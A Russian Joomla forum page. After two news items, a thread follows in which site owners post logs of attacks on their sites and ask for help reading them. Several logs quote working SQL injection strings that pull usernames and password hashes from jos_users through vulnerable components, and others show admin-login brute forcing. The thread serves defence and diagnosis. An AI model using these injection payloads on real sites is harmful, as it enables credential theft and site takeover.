Новости Joomla

Как тестировать Joomla PHP-разработчику? Компонент Patch tester.

👩‍💻 Как тестировать Joomla PHP-разработчику? Компонент Patch tester.Joomla - open source PHP-фреймворк с готовой админкой. Его основная разработка ведётся на GitHub. Для того, чтобы международному сообществу разработчиков было удобнее тестировать Pull Requests был создан компонент Patch Tester, который позволяет "накатить" на текущую установку Joomla именно те изменения, которые необходимо протестировать. На стороне инфраструктуры Joomla для каждого PR собираются готовые пакеты, в которых находится ядро + предложенные изменения. В каждом PR обычно находятся инструкции по тестированию: куда зайти, что нажать, ожидаемый результат. Тестировщики могут предположить дополнительные сценарии, исходя из своего опыта и найти баги, о которых сообщить разработчику. Или не найти, и тогда улучшение или исправление ошибки быстрее войдёт в ядро Joomla. Напомню, что для того, чтобы PR вошёл в ядро Joomla нужны минимум 2 положительных теста от 2 участников сообщества, кроме автора. Видео на YouTubeВидео на VK ВидеоВидео на RuTubeКомпонент на GitHub https://github.com/joomla-extensions/patchtester@joomlafeed#joomla #php #webdev #community

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6.2PageBuilder Toolkit - это специализированный плагин для конструктора страниц Yootheme Pro, содержит набор различных утилит для ускорения процесса работы и отладки макета, множественные улучшения в интерфейсе, включая поддержку dark mode, подсказки, быстрая смена разрешения в окне просмотра и много чего еще.v.1.6.2 Что нового?- Индикатор статусов: теперь не просто показывает состояние запросов, но и делает автоматические попытки их отправки при кратковременных сбоях в сети, а если это не помогло, то переводит конструктор в ручной режим, что позволяет сохранит макет и настройки темы прежде чем вы потеряете все, что было сделано с момента последнего сохранения- Подсветка ошибок в макете: плагин анализирует код страницы и может автоматически подсвечивать data атрибуты с кучей мусора, которые попадают в код страницы при копипасте из Figma в TinyMCE (пригодится для старых макетов, в текущей работе плагин сам очищает код мусора). Также есть подсветка семантических ошибок сборки - дубли h1 тега на странице и вложенных друг в друга заголовков.- Улучшена поддержка будущего релиза Yootheme Pro 5 и редактора CodeMirror 6Плагин для русскоязычных пользователей доступен в каталоге расширений SovMart и распространяется за символическую плату (100р). Разработчики Joomla расширений и партнеры автора могут получить плагин бесплатно.Для работы плагина необходим конструктор страниц Yootheme Pro.Разработчик плагина - участник нашего сообщества Александр Судьбинов (@alexrevo), член официальной группы поддержки Yootheme Pro. Страница расширенияОписание на сайте автора@joomlafeed#joomla #yootheme

0 Пользователей и 1 Гость просматривают эту тему.
  • 678 Ответов
  • 268442 Просмотров
*

xukvagpam

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
Что это означает в логах jGuard

Код
#<?php die('Direct Access To Log Files Not Permitted'); ?>
#Version: 1.0
#Date: 2012-10-18 18:38:05
#Fields: date time level c-ip status comment
#Software: Joomla! 1.5.26 Stable [ senu takaa ama busani ] 27-March-2012 18:00 GMT
2012-10-18 18:38:05 - 93.181.206.4 - Changed GET value from:   6 Result: использован никнейм "emaccinue"; пиктокод дешифрован; успех; to:

А вот запись в логах сервера от этого IP

Код
93.181.206.4 - - [18/Oct/2012:22:38:05 +0400] "GET /index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&Itemid=6+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22emaccinue%22;+%EF%E8%EA%F2%EE%EA%EE%E4+%E4%E5%F8%E8%F4%F0%EE%E2%E0%ED;+%F3%F1%EF%E5%F5; HTTP/1.0" 301 -
93.181.206.4 - - [18/Oct/2012:22:38:06 +0400] "GET / HTTP/1.0" 200 36177
*

illussion

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
** Table name in url [GET:category] => aca\' /*!union*//**//*!select*/ group_concat(username,0x3a,password,0x3a,usertype) from jos_users where usertype=\'Super Administrator\' -- \'
** Table name in url [REQUEST:category] => aca\' /*!union*//**//*!select*/ group_concat(username,0x3a,password,0x3a,usertype) from jos_users where usertype=\'Super Administrator\' -- \'

**PAGE / SERVER INFO


*REMOTE_ADDR :
89.149.194.172

*HTTP_USER_AGENT :
xpymep.exe

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_myblog&category=aca'%20/*!union*//**//*!select*/%20group_concat(username,0x3a,password,0x3a,usertype)%20from%20jos_users%20where%20usertype='Super%20Administrator'%20--%20'



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[option] => com_myblog
 -[category] => aca\' /*!union*//**//*!select*/ group_concat(username,0x3a,password,0x3a,usertype) from -- users where usertype=\'Super Administrator\' -- \'


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[option] => com_myblog
 -[category] => aca\' /*!union*//**//*!select*/ group_concat(username,0x3a,password,0x3a,usertype) from -- users where usertype=\'Super Administrator\' -- \'
*

Sergeyy

  • Захожу иногда
  • 154
  • 3 / 0
Здравствуйте!
Посмотрите тему:
http://joomlaforum.ru/index.php/topic,233697.0.html
создал в общих темах, не копировать ведь сюда?
*

Apple_Buy

  • Захожу иногда
  • 71
  • 1 / 0
  • Истина всегда рядом....
Использую только стандартную комплектацию Joomla 2.5.7 + Xmap + шаблон yootheme больше никаких сторонних компонентов

Компонент перенаправления записал попытку взлома (если правильно понимаю):
Код
http://tpgtitan.ru/ru/?option=com_spidercalendar&date=999999.9'+union+all+select+null,null,concat(0x3D3D3D3D3D,username,0x3D,password,0x3D3D3D3D3D),null,null,null+from+jos_users+--++D4NB4R
насколько этот способ взлома актуален для 2.5.7 ?

лестно, конечно, что сайт удостоился такого внимания, но хотелось бы оставить эти попытки безрезультатными.

Если у Вас не установлен на сайте компонент Joomla! Spider Calendar Lite 1.4 или его более ранняя версия, то бояться не стоит.

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "date" в сценарии index.php (когда параметр "option" равен "com_spidercalendar"). Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения
*

assaru

  • Давно я тут
  • 763
  • 88 / 1
Проблему можно решить и по скрину и по эмоциям, счет на оплату через ЛС (с) Nobody
*

wishlight

  • Гуру
  • 5075
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
*

Go-destroy

  • Захожу иногда
  • 221
  • 4 / 1
давно уже замечал в стандартном компоненте перенаправления, ошибки ссылок, имена которых схожи с системнами файлами wordprese и drupal!
Подозреваю что пытались опредилить cms!
А вот вчера начал обнаруживать такое:

http://joomla.org/obratnaya-svyaz/obratnaya-svyaz/obratnaya-svyaz/obratnaya-svyaz/obratnaya-svyaz/obratnaya-svyaz/obratnaya-svyaz
http://joomla.org/obratnaya-svyaz/obratnaya-svyaz/obratnaya-svyaz/obratnaya-svyaz/obratnaya-svyaz/obratnaya-svyaz
http://joomla.org/obratnaya-svyaz/obratnaya-svyaz

   
http://joomla.org/obratnaya-svyaz++++++++++++++++++++++++++++++++Result:+chosen+nickname+%22Adammahah%22;+success+%28from+first+page%29;    
http://joomla.org/obratnaya-svyaz++++++++++++++++++++++++++++++++Result:+chosen+nickname+%22Jimmyvk4ys%22;+success+%28from+first+page%29;
http://joomla.org/obratnaya-svyaz++++++++++++++++++++++++++++++++Result:+chosen+nickname+%22Stuptumvefmen%22;+success+%28from+first+page%29;
http://joomla.org/obratnaya-svyaz+%5BPLM=0%5D+GET+http://joomla.org/obratnaya-svyaz+%5B0,12376,31509%5D+-%3E+%5BN%5D+POST+http://joomla.org/obratna


obratnaya-svyaz++++++++++++++++++++++++++++++++Result:+chosen+nickname+"Adammahah";+success+(from+first+page);    
obratnaya-svyaz++++++++++++++++++++++++++++++++Result:+chosen+nickname+"Jimmyvk4ys";+success+(from+first+page);      
obratnaya-svyaz++++++++++++++++++++++++++++++++Result:+chosen+nickname+"Stuptumvefmen";+success+(from+first+page);
obratnaya-svyaz+[PLM=0]+GET+obratnaya-svyaz+[0,12376,31509]+->+[N]+POST+obratnaya-svyaz+[R=303][0,0,228]

Кто что поссоветует?


P.S. ссылки введут на стандартный компонент обратной связи!
« Последнее редактирование: 31.10.2012, 23:03:05 от Go-destroy »
*

Go-destroy

  • Захожу иногда
  • 221
  • 4 / 1
CAPTCHA спасет мир  ;)
Капча присутствует)
ты хочеш сказать что это боты ?)
*

Go-destroy

  • Захожу иногда
  • 221
  • 4 / 1
*

Sergeyy

  • Захожу иногда
  • 154
  • 3 / 0
Здравствуйте!
Опять:
Спойлер
[свернуть]

Что это такое?
Начало тут:http://joomlaforum.ru/index.php/topic,233697.0.html
*

RedStyle

  • Захожу иногда
  • 68
  • 1 / 0
Прямо в эту минуты 2 десятка моих сайтов ломает какой-то гад. Во всех логах подобные портянки. Только IP другие.

Начинается всё вот с этого:

46.37.163.242 - - [07/Nov/2012:07:42:19 +0400] "GET /admin.php HTTP/1.0" 404 1734
46.37.163.242 - - [07/Nov/2012:07:43:51 +0400] "GET /wp-login.php HTTP/1.0" 404 1734
212.142.228.182 - - [07/Nov/2012:10:40:11 +0400] "GET /administrator/index.php HTTP/1.0" 404 1734

Ну а далее:

Спойлер
[свернуть]

Пока просто тупо переименовал папку с админкой. Что ещё можно сделать? Изменить права на папку с админкой?
*

Rostok

  • Новичок
  • 7
  • 0 / 0
Подскажи, что происходит, удалил шел на сайте и еще почистил непонятные файлы, но в логах продолжается, не понятно, что твориться + я не могу понять часть кода левые символы
Спойлер
[свернуть]
что это подбор пароля?
50.56.26.124 - - [18/Nov/2012:15:22:41 +0200] "GET /administrator/ HTTP/1.0" 403 291 "-" "GlEKTLOv8AVN8htxWpjK"
50.56.26.124 - - [18/Nov/2012:15:22:42 +0200] "POST /administrator/ HTTP/1.0" 403 291 "-" "GlEKTLOv8AVN8htxWpjK"
50.56.26.124 - - [18/Nov/2012:15:23:23 +0200] "GET /administrator/ HTTP/1.0" 403 291 "-" "6 gFaF8EIK"
50.56.26.124 - - [18/Nov/2012:15:23:23 +0200] "POST /administrator/ HTTP/1.0" 403 291 "-" "6 gFaF8EIK"
50.56.26.124 - - [18/Nov/2012:15:24:03 +0200] "GET /administrator/ HTTP/1.0" 403 291 "-" "80N6cA4e x9v1p1TM8k"
50.56.26.124 - - [18/Nov/2012:15:24:04 +0200] "POST /administrator/ HTTP/1.0" 403 291 "-" "80N6cA4e x9v1p1TM8k"
« Последнее редактирование: 18.11.2012, 17:26:46 от Rostok »
*

wishlight

  • Гуру
  • 5075
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
*

yrygvay

  • Завсегдатай
  • 1293
  • 36 / 3
Подскажите на что это похоже:
Код
195.239.178.205 - - [09/Dec/2012:03:43:42 +0400] "GET / HTTP/1.0" 200 50037 "-" "Mozilla/5.0 (compatible; Nigma.ru/3.0; crawler@nigma.ru)"
213.171.204.130 - - [09/Dec/2012:04:18:02 +0400] "GET /administrator/ HTTP/1.0" 200 5518 "-" "rAq71IgYLuNNd4TDq"
213.171.204.130 - - [09/Dec/2012:04:18:02 +0400] "POST /administrator/ HTTP/1.0" 303 235 "-" "rAq71IgYLuNNd4TDq"
213.171.204.130 - - [09/Dec/2012:04:18:02 +0400] "GET /administrator/index.php HTTP/1.0" 200 5708 "-" "rAq71IgYLuNNd4TDq"
84.19.62.229 - - [09/Dec/2012:05:15:10 +0400] "GET /administrator/ HTTP/1.0" 200 5518 "-" "oNJ IwCRe5Isk0aiVAtE"
84.19.62.229 - - [09/Dec/2012:05:15:10 +0400] "POST /administrator/ HTTP/1.0" 303 235 "-" "oNJ IwCRe5Isk0aiVAtE"
84.19.62.229 - - [09/Dec/2012:05:15:10 +0400] "GET /administrator/index.php HTTP/1.0" 200 5708 "-" "oNJ IwCRe5Isk0aiVAtE"
213.171.204.130 - - [09/Dec/2012:05:54:20 +0400] "GET /administrator/ HTTP/1.0" 200 5518 "-" "FoPtR5Z93sGP"
213.171.204.130 - - [09/Dec/2012:05:54:20 +0400] "POST /administrator/ HTTP/1.0" 303 235 "-" "FoPtR5Z93sGP"
213.171.204.130 - - [09/Dec/2012:05:54:20 +0400] "GET /administrator/index.php HTTP/1.0" 200 5708 "-" "FoPtR5Z93sGP"
84.19.62.229 - - [09/Dec/2012:07:21:06 +0400] "GET /administrator/ HTTP/1.0" 200 5518 "-" "qahbLKYM4nuQPcfub"
84.19.62.229 - - [09/Dec/2012:07:21:07 +0400] "POST /administrator/ HTTP/1.0" 303 235 "-" "qahbLKYM4nuQPcfub"
84.19.62.229 - - [09/Dec/2012:07:21:07 +0400] "GET /administrator/index.php HTTP/1.0" 200 5708 "-" "qahbLKYM4nuQPcfub"
213.171.204.130 - - [09/Dec/2012:07:32:39 +0400] "GET /administrator/ HTTP/1.0" 200 5518 "-" "mhUBhqtOaJ nHenohCy"
213.171.204.130 - - [09/Dec/2012:07:32:40 +0400] "POST /administrator/ HTTP/1.0" 303 235 "-" "mhUBhqtOaJ nHenohCy"
213.171.204.130 - - [09/Dec/2012:07:32:40 +0400] "GET /administrator/index.php HTTP/1.0" 200 5708 "-" "mhUBhqtOaJ nHenohCy"
213.171.204.130 - - [09/Dec/2012:09:09:51 +0400] "GET /administrator/ HTTP/1.0" 200 5518 "-" "KQ7CwTCIQkT6Z"
213.171.204.130 - - [09/Dec/2012:09:09:51 +0400] "POST /administrator/ HTTP/1.0" 303 235 "-" "KQ7CwTCIQkT6Z"
213.171.204.130 - - [09/Dec/2012:09:09:52 +0400] "GET /administrator/index.php HTTP/1.0" 200 5708 "-" "KQ7CwTCIQkT6Z"
84.19.62.229 - - [09/Dec/2012:09:24:09 +0400] "GET /administrator/ HTTP/1.0" 200 5518 "-" "RAfcDymL6s"
84.19.62.229 - - [09/Dec/2012:09:24:09 +0400] "POST /administrator/ HTTP/1.0" 303 235 "-" "RAfcDymL6s"
84.19.62.229 - - [09/Dec/2012:09:24:09 +0400] "GET /administrator/index.php HTTP/1.0" 200 5708 "-" "RAfcDymL6s"
213.171.204.130 - - [09/Dec/2012:11:03:23 +0400] "GET /administrator/ HTTP/1.0" 200 5518 "-" "hNbMqT fRPFGbrW1"
213.171.204.130 - - [09/Dec/2012:11:03:23 +0400] "POST /administrator/ HTTP/1.0" 303 235 "-" "hNbMqT fRPFGbrW1"
213.171.204.130 - - [09/Dec/2012:11:03:23 +0400] "GET /administrator/index.php HTTP/1.0" 200 5708 "-" "hNbMqT fRPFGbrW1"
Смотрю....
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Цитировать
Подскажите на что это похоже:
на подбор пароля

можно поинтересоваться что за хост, просто есть мысль, и хочу утвердить её
*

freytas11

  • Захожу иногда
  • 83
  • 0 / 0
Подскажите кто в курсе что это означает.

Логи из jhackguard
Спойлер
[свернуть]

из Marco's interceptor warning
Спойлер
[свернуть]
Спойлер
[свернуть]
Спойлер
[свернуть]
*

wishlight

  • Гуру
  • 5075
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Парочка неудачных попыток взлома + логи яндекса чтоле.
*

AlexJAM

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Лог JHackGuard 1.4.2:
Спойлер
[свернуть]
Пытался найти более подробную информацию по структуре этого файла, но не получилось.
Буду благодарен за дополнительную информацию - что было, чем закончилось.
Насколько посмотрел - на сайте ../../cache/errors.php файла нет. Да и кеш выключен впринципе - сайт как раз допиливаю по шаблону, только мешает.
« Последнее редактирование: 11.01.2013, 20:14:06 от AlexJAM »
*

wishlight

  • Гуру
  • 5075
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Кто-то пытался прописать вам редиректы на http://loriannmarchese.com/language/nb-BO/www/0n.php если не ошибаюсь. Через что не пойму. Если php файлы у вас не изменены и плагин нормально отразил атаку, обновите все на сайте.
*

AlexJAM

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Спасибо за информацию.
Хотелось бы конечно поподробнее узнать про структуру файла лога.

сайт функционирует. все модули обновлены. ждем дальше.

Up. всплыл новый лог.

В папке /logs файлик error.php - в начале как и ожидаемо
 
Спойлер
[свернуть]

лог JHack'а

Спойлер
[свернуть]

 пора искать дыру)
пока прочистил все файлики  утилитой из этой темки. список зараженного при необходимости могу предоставить.

« Последнее редактирование: 15.01.2013, 23:51:42 от AlexJAM »
*

wishlight

  • Гуру
  • 5075
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
*

AlexJAM

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Сегодня двойной улов от JHackGuard'а
Спойлер
[свернуть]
и
Спойлер
[свернуть]

Как и в прошлый раз никаких php файлов в директории ../../cache/ нет
*

AlexJAM

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Снова улов. Прям каждый день... Начинаю беспокоиться)

Спойлер
[свернуть]
*

RexNebular

  • Захожу иногда
  • 52
  • 0 / 0
Доброе утро!
ТОже встала проблема с взломом сайта. Уже все пароли сменил, почистил все, но все равно лезет както...
лог  Marco's SQL Injection
Спойлер
[свернуть]
я так понимаю дырка в ckforms? подскажите пжлст.
*

AlexJAM

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
*

Morphina

  • Новичок
  • 4
  • 0 / 0
Я использую Joostina, поэтому все современные примочки для Joomla мне недоступны. Пытаясь найти хоть какое-то решение наткнулся на такую штуку как NinjaFirewall. Это небольшая самостоятельная программа. В бесплатной версии конечно всё сильно зарезано, но кое-что работает.
Мне тоже на днях попортили все js файлы дописками - я лечил руками и сразу менял права доступа на 444. Помогло.

А вот что по логам (подробностей не особо, но в принципе хватает):

Спойлер
[свернуть]

Спойлер
[свернуть]

Спойлер
[свернуть]

Спойлер
[свернуть]

Спойлер
[свернуть]

Спойлер
[свернуть]

Ну и в таком духе почти весь день. Часть IP заблокировал через .htaccess - посмотрим что ночью делать будут.

*

ihomyak

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
jhackguard перестает работать после обновления до новой 1.4.2 версии.
без обновления все работает.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 3181
Последний ответ 31.03.2024, 16:14:32
от SeBun
Скрипты защиты Joomla 4

Автор mister_boy

Ответов: 6
Просмотров: 3470
Последний ответ 16.05.2023, 16:38:58
от mister_boy
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 2767
Последний ответ 05.10.2021, 21:39:26
от ShopES
Тестирую сайты на уязвимости

Автор SalityGEN

Ответов: 0
Просмотров: 1047
Последний ответ 21.08.2021, 23:01:01
от SalityGEN
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 2433
Последний ответ 03.11.2020, 17:36:03
от Cedars